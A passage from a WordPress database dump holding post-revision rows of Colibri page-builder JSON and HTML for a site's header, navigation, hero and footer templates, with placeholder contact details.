128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-10-13 09:19:36','2023-10-13 13:19:36','',182,'https://gsudice.dataconn.net/?p=1707',0,'revision','',0),(1708,1,'2023-10-13 09:19:36','2023-10-13 13:19:36','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2023-10-13 09:19:36','2023-10-13 13:19:36','',26,'https://gsudice.dataconn.net/?p=1708',0,'revision','',0),(1709,1,'2023-10-13 09:19:36','2023-10-13 13:19:36','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2023-10-13 09:19:36','2023-10-13 13:19:36','',25,'https://gsudice.dataconn.net/?p=1709',0,'revision','',0),(1710,1,'2023-10-13 09:19:36','2023-10-13 13:19:36','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2023-10-13 09:19:36','2023-10-13 13:19:36','',29,'https://gsudice.dataconn.net/?p=1710',0,'revision','',0),(1711,1,'2023-10-13 09:19:36','2023-10-13 13:19:36','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2023-10-13 09:19:36','2023-10-13 13:19:36','',28,'https://gsudice.dataconn.net/?p=1711',0,'revision','',0),(1713,1,'2023-10-13 09:20:33','2023-10-13 